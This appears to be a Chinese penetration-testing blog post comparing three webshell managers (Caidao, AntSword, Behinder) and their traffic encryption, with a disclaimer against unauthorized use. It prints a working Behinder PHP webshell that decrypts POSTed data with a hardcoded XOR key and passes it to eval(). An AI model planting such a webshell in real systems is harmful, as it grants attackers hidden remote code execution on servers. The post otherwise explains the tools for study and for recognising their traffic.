菜刀、蚁剑以及冰蝎三款Webshell管理工具简介

今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。

免责声明:
本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为,否则造成一切严重后果自负!
再次强调:严禁对未授权设备进行渗透测试!

一、三款webshell管理工具简单对比

当前,在渗透测试时常用的webshell管理工具又菜刀、蚁剑和冰蝎。者三款webshell管理工具特点如下所示:
1、菜刀
菜刀属于比较原始的插件,功能比较单一,使用比较简单,目前没有提供插件,也不支持扩展,目前也已经停止更新,传输方式是单项加密传输。此外,菜刀的问题在于只能够处理eval()函数,而无法处理assert()等函数。
2、蚁剑
蚁剑是一款还处于更新状态的工具,存在插件仓库,扩展性强,采取的数据传输方式是单向加密传输。蚁剑与菜刀相比支持编码和解码功能。
3、冰蝎
冰蝎目前也处于更新状态,但是不支持插件,采取的数据传输方式是双向加密传输,可以联动MSF。冰蝎相对而言偏向于后渗透阶段。

二、菜刀数据包解析

使用菜刀连接PHP webshell的通信数据包如下所示:
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介_第1张图片
从上图可以看出,菜刀的数据包是不加密的。

三、蚁剑数据包解析

使用蚁剑连接PHP webshell的通信数据包如下所示:
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介_第2张图片
从上图可以看出,蚁剑对payload进行加密的逻辑是,将payload进行加密后,转化为一个参数的值,然后控制接收该参数并进行解密。

四、冰蝎数据包解析

使用冰蝎连接default_xor_base64类型的PHP webshell的通信数据包如下所示:
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介_第3张图片
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介_第4张图片
从上图可以看出,冰蝎的数据包是加密的。
冰蝎生成的PHP木马如下所示:


@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
	$after=$bs($data."");
	for($i=0;$i<strlen($after);$i++) {
    	$after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>

在上述代码中,file_get_contents(“php://input”)可以接收客户端以POST的方式上传的参数,上传的结果会作为Decrypt参数的输入。
Decrypt函数的作用是对原始数据先进行Base64解密,然后再进行流解密,最后把数据处理的结果输出,实际上就是一个数据解密过程。
原创不易,转载请说明出处:https://blog.csdn.net/weixin_40228200

你可能感兴趣的:(信息安全,Web安全,渗透测试,webshell,安全)